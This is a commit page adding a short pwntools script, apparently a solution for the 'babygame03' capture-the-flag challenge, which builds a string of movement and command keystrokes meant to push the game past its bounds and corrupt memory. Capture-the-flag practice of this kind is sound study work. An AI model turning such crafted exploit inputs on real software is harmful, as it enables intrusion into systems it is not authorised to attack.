babygame03_temp
This commit is contained in:
10
babygame03/mkstr.py
Executable file
10
babygame03/mkstr.py
Executable file
@@ -0,0 +1,10 @@
|
||||
#!/usr/bin/env python3
|
||||
from pwn import *
|
||||
|
||||
a = 'aaaa'+'a'*4+'wwwws'
|
||||
b = 'a'*47+'lp'+'ws'
|
||||
|
||||
s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
|
||||
|
||||
print(s)
|
||||
|
||||
Reference in New Issue
Block a user